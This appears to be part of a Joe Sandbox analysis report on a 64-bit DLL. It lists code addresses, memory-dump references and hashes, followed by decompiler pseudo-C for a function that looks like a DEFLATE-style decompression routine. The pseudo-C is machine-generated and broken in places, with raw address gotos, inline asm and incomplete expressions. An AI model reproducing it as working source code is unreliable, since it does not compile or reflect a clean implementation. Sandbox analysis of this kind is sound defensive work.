0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731a9984fb77072a553201138c4c7417f686d2b3257b441ef28547d0c07f17cb
Instruction ID: 5fb313a38794de8771e4b834c0387acd573e96e819a0afa74435ed4a17ba5dce
Opcode Fuzzy Hash: 731a9984fb77072a553201138c4c7417f686d2b3257b441ef28547d0c07f17cb
Instruction Fuzzy Hash: ECF1F772B0C3C58BD7A48F29E4407AAB7E5F384794F148236DA9957BD8DA3DD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FCE7 Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E000007FE7FEF305FCE7(signed char __ebx, void* __rax, signed int __rdx, signed int __rdi, signed long long __r8, void* __r10, void* __r12, long long __r13, void* __r14, signed int __r15) {
				signed int _t452;
				signed int _t456;
				signed char _t457;
				signed char _t458;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed char _t463;
				signed char _t470;
				signed int _t478;
				signed int _t481;
				signed int _t484;
				unsigned int _t489;
				signed int _t490;
				short _t492;
				signed int _t506;
				signed short _t508;
				signed int _t509;
				signed int _t511;
				signed int _t519;
				signed short _t521;
				signed char _t530;
				signed int _t536;
				signed int _t539;
				unsigned int _t543;
				signed int _t572;
				signed char _t573;
				signed int _t577;
				signed char _t578;
				signed int _t587;
				signed char _t594;
				signed char _t595;
				signed char _t598;
				unsigned int _t617;
				signed int _t618;
				short _t620;
				signed char _t635;
				signed char _t637;
				signed int _t641;
				signed int _t642;
				signed char _t644;
				signed char _t650;
				signed int _t654;
				signed char _t658;
				signed int _t661;
				signed char _t680;
				unsigned int _t687;
				signed char _t689;
				signed int _t699;
				signed int _t706;
				signed int _t719;
				signed int _t720;
				signed int _t730;
				signed short _t732;
				signed int _t734;
				signed short _t737;
				signed int _t742;
				signed int _t743;
				signed short _t746;
				void* _t750;
				signed int _t753;
				signed int _t757;
				signed int _t764;
				signed int _t767;
				signed int _t770;
				signed char _t772;
				signed int _t792;
				signed int _t794;
				signed int _t818;
				signed int _t821;
				void* _t828;
				signed short _t839;
				void* _t844;
				void* _t847;
				void* _t870;
				signed int _t880;
				void* _t882;
				void* _t911;
				short _t919;
				void* _t924;
				signed int _t952;
				signed int _t953;
				void* _t957;
				void* _t960;
				void* _t962;
				signed int _t970;
				void* _t975;
				signed long long _t978;
				signed long long _t982;
				signed long long _t983;
				signed long long _t989;
				signed long long _t990;
				long long _t1006;
				signed int _t1015;
				signed long long _t1016;
				signed long long _t1017;
				signed long long _t1021;
				signed long long _t1022;
				signed long long _t1023;
				signed long long _t1024;
				signed long long _t1025;
				signed long long _t1026;
				signed long long _t1027;
				signed long long _t1029;
				void* _t1030;
				long long* _t1037;
				unsigned long long _t1039;
				void* _t1043;
				long long _t1044;
				signed long long _t1046;
				signed long long _t1050;
				signed long long _t1051;
				signed long long _t1062;
				signed long long _t1066;
				intOrPtr _t1074;
				void* _t1076;
				long long _t1079;
				signed long long _t1080;
				intOrPtr _t1081;
				signed long long _t1083;
				void* _t1092;
				signed long long _t1095;
				unsigned long long _t1099;
				signed long long _t1103;
				unsigned long long _t1104;
				signed long long _t1112;
				unsigned long long _t1115;
				unsigned long long _t1116;
				intOrPtr _t1125;
				signed long long _t1130;
				unsigned long long _t1132;
				signed long long _t1139;
				signed long long _t1140;
				signed long long _t1144;
				signed long long _t1148;
				intOrPtr _t1150;
				void* _t1152;
				signed long long _t1161;
				signed long long _t1165;
				long long _t1166;
				void* _t1167;
				signed long long _t1170;
				signed char* _t1175;
				signed long long _t1182;
				signed long long _t1183;
				signed long long _t1184;
				signed long long _t1186;
				void* _t1191;
				signed long long _t1202;
				void* _t1204;
				signed long long _t1207;
				void* _t1208;
				void* _t1209;
				long long _t1210;
				void* _t1214;
				intOrPtr _t1217;
				void* _t1219;
				intOrPtr _t1226;
				intOrPtr _t1229;
				long long _t1231;
				signed char* _t1234;
				intOrPtr _t1237;
				intOrPtr _t1238;
				intOrPtr _t1239;
				intOrPtr _t1240;
				intOrPtr _t1242;
				signed long long _t1243;
				intOrPtr _t1245;
				long long _t1248;
				signed char* _t1251;
				long long _t1259;
				signed char* _t1262;
				void* _t1266;
				void* _t1267;
				void* _t1268;
				void* _t1272;
				void* _t1275;
				void* _t1276;
				void* _t1280;
				void* _t1281;
				signed int* _t1282;
				signed long long _t1288;

				_t573 = __ebx;
				if ( *(_t1204 + 0x40) -  *(__r10 + 0x38) >= 0) goto 0xf305fd3a;
				_t594 =  *(_t1204 + 0x38);
				if (_t594 - 3 >= 0) goto 0xf305fd6b;
				if (__r14 == __r15) goto 0xf305fd2c;
				_t1039 =  *(_t1204 + 0x30) | __rdx << _t594;
				 *(_t1204 + 0x30) = _t1039;
				_t595 = _t594 + 8;
				 *(_t1204 + 0x38) = _t595;
				r12d = 0;
				_t1266 = __r14 + 1;
				goto 0xf305fd32;
				r12d =  *(_t1204 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fd01;
				goto 0xf305fda6;
				 *(__r10 + 0x38) = 0x13;
				_t1165 = __r8;
				_t452 = E000007FE7FEF3061920(__rax, __r10, _t1204 + 0x30, __r8, __r10);
				_t1207 = _t1165;
				_t1245 =  *((intOrPtr*)(_t1204 + 0x1a0));
				_t1237 =  *((intOrPtr*)(_t1204 + 0x58));
				r12d = _t452;
				goto 0xf305fda6;
				 *(_t1204 + 0x30) = _t1039 >> 3;
				 *(_t1204 + 0x38) = _t595 + 0xfffffffd;
				if (_t452 - 0x13 >= 0) goto 0xf30612c6;
				 *(_t1237 + 0x7fef31212c4) = _t573 & 0x00000007;
				 *(_t1204 + 0x40) = _t452 + 1;
				r12d = 0;
				if (r12b == 0) goto 0xf305fceb;
				_t828 = (r12b & 0xffffffff) - 1;
				if (_t828 == 0) goto 0xf30606d0;
				_t598 =  *(_t1204 + 0x38);
				_t1092 = _t1266;
				if (_t828 >= 0) goto 0xf30604e6;
				if (_t1092 == __r15) goto 0xf305fe03;
				_t1182 = __r15 << _t598;
				 *(_t1204 + 0x30) =  *(_t1204 + 0x30) | _t1182;
				 *(_t1204 + 0x38) = _t598 + 8;
				_t1267 = _t1092 + 1;
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1095 =  *((intOrPtr*)(_t1204 + 0x1a8));
				_t1062 = __r15 - _t1267;
				if (_t1062 - 4 < 0) goto 0xf306060d;
				_t975 = _t1095 - _t1207;
				if (_t975 - 2 < 0) goto 0xf306060d;
				if (_t975 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1062 - 0xd > 0) goto 0xf3060750;
				_t456 =  *(_t1204 + 0x38);
				if (_t975 - 0x1e >= 0) goto 0xf305fe76;
				_t1268 = _t1267 + 4;
				 *(_t1204 + 0x30) = _t1095 << _t456 |  *(_t1204 + 0x30);
				_t457 = _t456 + 0x20;
				 *(_t1204 + 0x38) = _t457;
				goto 0xf305fe7b;
				_t730 =  *((short*)(_t1237 + 0x3c + _t1062 * 2));
				if (_t730 < 0) goto 0xf305fea3;
				if ((_t730 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t730 - 0x23f > 0) goto 0xf30611c7;
				_t732 =  *((short*)(_t1237 + 0x83c + __rdi * 2));
				_t839 = _t732;
				if (_t839 < 0) goto 0xf305fea8;
				 *(_t1204 + 0x40) = _t732 & 0x0000ffff;
				_t1099 =  *(_t1204 + 0x30) >> 0xb;
				 *(_t1204 + 0x30) = _t1099;
				_t458 = _t457 - 0xb;
				 *(_t1204 + 0x38) = _t458;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t839 < 0) goto 0xf305f43b;
				_t757 =  *((short*)(_t1237 + 0x3c + _t1062 * 2));
				if (_t757 < 0) goto 0xf305ff16;
				if ((_t757 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t757 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(_t1237 + 0x83c + _t1165 * 2)) < 0) goto 0xf305ff1b;
				 *(_t1204 + 0x30) = _t1099 >> 0xb;
				 *(_t1204 + 0x38) = _t458 - 0xb;
				_t844 = _t1207 -  *((intOrPtr*)(_t1204 + 0x1a8));
				if (_t844 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(_t1245 + _t1207)) = dil;
				asm("bt esi, 0x8");
				if (_t844 < 0) goto 0xf3060a8e;
				if (_t1207 + 1 -  *((intOrPtr*)(_t1204 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(_t1245 + _t1207 + 1)) = sil;
				_t1208 = _t1207 + 2;
				_t460 =  *(_t1204 + 0x40);
				r12b = 0x15;
				if (_t460 - 0xff > 0) goto 0xf305f43b;
				_t847 = _t1208 -  *((intOrPtr*)(_t1204 + 0x1a8));
				if (_t847 == 0) goto 0xf3061262;
				if (_t847 >= 0) goto 0xf3061284;
				 *(_t1245 + _t1208) = _t460;
				_t1209 = _t1208 + 1;
				r12b = 0xc;
				_t461 =  *(_t1204 + 0x38);
				if (_t461 - 0xe > 0) goto 0xf30600a1;
				_t1066 = __r15 - _t1268;
				if (_t1066 - 1 > 0) goto 0xf3060085;
				_t617 =  *((short*)(_t1237 + 0xddc + _t1066 * 2));
				if (_t617 < 0) goto 0xf3060019;
				if ((_t617 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t618 = _t617 >> 9;
				if (_t461 - _t618 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t461 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t618 - 0x23f > 0) goto 0xf30611b9;
				_t620 =  *((short*)(_t1237 + 0x15dc + _t1066 * 2));
				if (_t620 >= 0) goto 0xf3060051;
				if (_t461 - 0xc >= 0) goto 0xf3060023;
				if (_t620 >= 0) goto 0xf30600a1;
				if (_t1268 == __r15) goto 0xf3060156;
				_t1183 = _t1182 << _t461;
				_t1103 =  *(_t1204 + 0x30) | _t1183;
				 *(_t1204 + 0x30) = _t1103;
				_t462 = _t461 + 8;
				 *(_t1204 + 0x38) = _t462;
				if (_t462 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1184 = _t1183 << _t462;
				_t1104 = _t1103 | _t1184;
				 *(_t1204 + 0x30) = _t1104;
				_t463 = _t462 + 0x10;
				 *(_t1204 + 0x38) = _t463;
				_t734 =  *((short*)(_t1237 + 0xddc + _t1066 * 2));
				if (_t734 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t734 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t737 =  *((short*)(_t1237 + 0x15dc + __rdi * 2));
				if (_t737 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1204 + 0x30) = _t1104 >> 0xb;
				 *(_t1204 + 0x38) = _t463 - 0xb;
				if ((_t737 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1204 + 0x44) =  *(__rdi + 0xf311ef48) & 0x000000ff;
				 *(_t1204 + 0x3c) =  *(0xf311ef68 + __rdi * 2) & 0x0000ffff;
				_t633 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t866 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1204 + 0x7c);
				goto 0xf3060149;
				_t635 =  *(_t1204 + 0x38);
				_t577 =  *(_t1204 + 0x50);
				if (_t635 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1204 + 0x30) =  *(_t1204 + 0x30) | _t1184 << _t635;
				 *(_t1204 + 0x38) = _t635 + 8;
				_t1272 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t978 =  *((intOrPtr*)(_t1204 + 0x1a8));
				_t870 = _t1209 - _t978;
				if (_t870 == 0) goto 0xf3061238;
				if (_t870 >= 0) goto 0xf3061284;
				 *((char*)(_t1245 + _t1209)) =  *(_t1204 + 0x3c);
				_t1210 = _t1209 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1204 + 0x40) =  *(_t1204 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t1204 + 0x70)) = __r13;
				r13d =  *(_t1204 + 0x3c);
				_t1186 =  *((intOrPtr*)(_t1204 + 0x1a8));
				if (_t1210 == _t1186) goto 0xf3060b97;
				_t1043 = _t1186 - _t1210;
				_t1166 = _t1210;
				_t1044 =  >=  ? _t978 : _t1043;
				 *((long long*)(_t1204 + 0x28)) =  *(_t1204 + 0xb8);
				 *((long long*)(_t1204 + 0x20)) = _t1044;
				_t1231 = _t1166;
				E000007FE7FEF30616A0();
				_t1238 =  *((intOrPtr*)(_t1204 + 0x58));
				_t1214 = _t1166 + _t1044;
				r12b = 0xc;
				 *(_t1204 + 0x40) =  *(_t1204 + 0x40) - _t577;
				if (_t1043 != _t978) goto 0xf3060208;
				_t1259 =  *((intOrPtr*)(_t1204 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t1238 + 0x18)) == 0) goto 0xf305f43b;
				_t637 =  *(_t1204 + 0x38);
				_t1150 =  *((intOrPtr*)(_t1204 + 0xe0));
				_t792 =  >=  ? r14d : _t637 >> 3;
				_t578 = _t1186 * 8;
				_t470 = (_t637 & 0xfffffff8) - _t578;
				 *(_t1204 + 0x38) = _t470;
				_t1275 = _t1272 - __r15 + _t1150 - _t1186;
				if (_t1275 - _t1150 > 0) goto 0xf30613c7;
				_t1276 = _t1275 + _t1259;
				 *(_t1204 + 0x30) =  !(0xffffffff << (_t470 & 0x00000038)) &  *(_t1204 + 0x30) >> (_t637 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1204 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1204 + 0x40) = 0;
				r12b = 0x17;
				_t641 =  *(_t1204 + 0x40) & 0x000001ff;
				 *(_t1204 + 0x40) = _t641;
				r12b = 0x14;
				if (_t641 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t641 - 0x11d > 0) goto 0xf305f43b;
				_t642 =  *(_t978 + 0xf311eee8) & 0x000000ff;
				_t880 = _t642;
				r12b = _t880 == 0;
				 *(_t1204 + 0x44) = _t642;
				 *(_t1204 + 0x40) =  *(0xf311ef08 + _t978 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1204 + 0x3c);
				if (_t880 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1204 + 0xf4)) != 0) goto 0xf305f43b;
				_t1167 = _t1214 + 0xf311ef08;
				_t1112 =  *((intOrPtr*)(_t1204 + 0x1a8));
				_t882 = _t1167 - _t1112;
				if (_t882 > 0) goto 0xf30603b1;
				_t982 = (_t1214 - _t1231 &  *(_t1204 + 0xb8)) - _t1214;
				if (_t882 < 0) goto 0xf3060a9a;
				if (_t982 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t478 =  *(_t1204 + 0x40);
				_t742 =  *(_t1204 + 0x50);
				if (_t478 - 3 > 0) goto 0xf3060605;
				_t644 =  *(_t1204 + 0x38);
				if (_t644 == 0) goto 0xf3060421;
				_t1191 = _t1276;
				if (_t644 - 8 >= 0) goto 0xf3060436;
				if (_t1191 == __r15) goto 0xf3060413;
				_t1046 =  *(_t1204 + 0x30) | _t1112 << _t644;
				 *(_t1204 + 0x30) = _t1046;
				 *(_t1204 + 0x38) = _t644 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t742;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1191 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1115 = _t1046 >> 8;
				 *(_t1204 + 0x30) = _t1115;
				 *(_t1204 + 0x38) = ( *(_t1238 + 0x14) << 8) + 0xfffffff8;
				_t706 =  *(_t1238 + 0x14) << 8;
				_t650 = _t578 & 0x000000ff | _t706;
				 *(_t1238 + 0x14) = _t650;
				 *(_t1204 + 0x40) = _t478 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t742;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t481 = _t650 & 0x000000ff;
				if (_t481 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t794 =  !_t792 & _t706;
				_t1116 = _t1115 >> _t481;
				 *(_t1204 + 0x30) = _t1116;
				 *(_t1204 + 0x38) = _t578;
				 *(_t1204 + 0x40) =  *(_t1204 + 0x40) + _t794;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1204 + 0x30) = _t1116 >> _t481;
				 *(_t1204 + 0x38) = _t578;
				 *(_t1204 + 0x3c) =  *(_t1204 + 0x3c) + ( !_t794 & _t706);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1204 + 0x30) = _t1046 >> _t481;
				 *(_t1204 + 0x38) = _t742;
				 *(_t1204 + 0x80) = _t982;
				 *(_t1204 + 0x88) = _t982;
				 *((long long*)(_t1204 + 0x90)) = 0xb;
				_t654 =  *(_t1204 + 0x3c);
				_t983 = _t982 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t654 != 0x10) goto 0xf30606d9;
				if (_t1167 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1204 + 0x30) = _t983 >> 8;
				 *(_t1204 + 0x38) = _t654 + 0xfffffff8;
				 *(_t1204 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t484 =  *(_t1238 + 0x291d) & 0x0000ffff;
				 *(_t1204 + 0x40) = _t484;
				r12b = 0x1e;
				if (_t484 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t484 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1074 =  *((intOrPtr*)(_t1204 + 0x128));
				E000007FE7FEF30F24C0();
				_t1239 =  *((intOrPtr*)(_t1204 + 0x58));
				 *(_t1204 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t983 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1204 + 0x6c);
				if (_t1074 - 1 > 0) goto 0xf3060acc;
				_t658 =  *(_t1204 + 0x38);
				_t489 =  *((short*)(_t1239 + 0x3c + _t983 * 2));
				if (_t489 < 0) goto 0xf3060659;
				if ((_t489 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t490 = _t489 >> 9;
				if (_t658 - _t490 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t658 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t490 - 0x23f > 0) goto 0xf3061218;
				_t492 =  *((short*)(_t1239 + 0x83c + _t983 * 2));
				if (_t492 >= 0) goto 0xf3060690;
				if (_t658 - 0xc >= 0) goto 0xf3060663;
				if (_t492 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1280 = __r15 + 1;
				 *(_t1204 + 0x30) =  *(_t1204 + 0x30) | _t983 << _t658;
				 *(_t1204 + 0x38) = _t1074 + 8;
				_t911 = _t658 - 6;
				if (_t911 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1152 =  *((intOrPtr*)(_t1204 + 0x80 + _t983 * 8)) + (_t1046 & 0xffffffff);
				if (_t911 < 0) goto 0xf30613e0;
				if (_t1152 + _t1167 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1152 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1204 + 0x40) =  *(_t1204 + 0x40) + _t742;
				r12b = 0xa;
				_t1240 =  *((intOrPtr*)(_t1204 + 0x58));
				_t1248 =  *((intOrPtr*)(_t1204 + 0x1a0));
				_t1217 =  *((intOrPtr*)(_t1204 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t764 =  *(_t1204 + 0x38);
				 *(_t1204 + 0x68) =  *(_t1204 + 0x3c);
				r9d =  *(_t1204 + 0x44);
				_t989 = __r15 - _t1280;
				r12b = 0xc;
				if (_t989 - 0xe < 0) goto 0xf3060b66;
				if (_t764 - 0x1d > 0) goto 0xf3060794;
				_t990 = _t989 << _t764;
				_t1281 = _t1280 + 4;
				_t661 =  *((short*)(_t1240 + 0x3c + _t990 * 2));
				if (_t661 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t661 - 0x23f > 0) goto 0xf306126f;
				_t919 =  *((short*)(_t1240 + 0x83c +  &(( *(_t1204 + 0xe8))[_t1167]) * 2));
				if (_t919 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t919 < 0) goto 0xf30608a8;
				_t506 =  *((short*)(_t1240 + 0x3c + _t990 * 2));
				if (_t506 < 0) goto 0xf3060820;
				if ((_t506 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t506 - 0x23f > 0) goto 0xf306127b;
				_t508 =  *((short*)(_t1240 + 0x83c + _t990 * 2));
				if (_t508 < 0) goto 0xf3060825;
				_t509 = _t508 & 0x0000ffff;
				_t924 = _t1217 -  *((intOrPtr*)(_t1204 + 0x1a8));
				if (_t924 >= 0) goto 0xf3061284;
				_t767 = _t764 + 0x20;
				 *(_t1248 + _t1217) = bpl;
				_t1076 = _t1217 + 1;
				asm("bt eax, 0x8");
				if (_t924 < 0) goto 0xf30608a3;
				_t1125 =  *((intOrPtr*)(_t1204 + 0x1a8));
				if (_t1076 - _t1125 >= 0) goto 0xf30612a2;
				 *(_t1248 + _t1217 + 1) = _t509;
				if (_t1125 - _t1217 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1219 = _t1076;
				_t511 = _t509 & 0x000001ff;
				if (_t511 == 0x100) goto 0xf3060b5e;
				if (_t511 - 0x11d > 0) goto 0xf3061298;
				if (_t767 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1281 - 3 <= 0) goto 0xf306140a;
				_t1282 = _t1281 + 4;
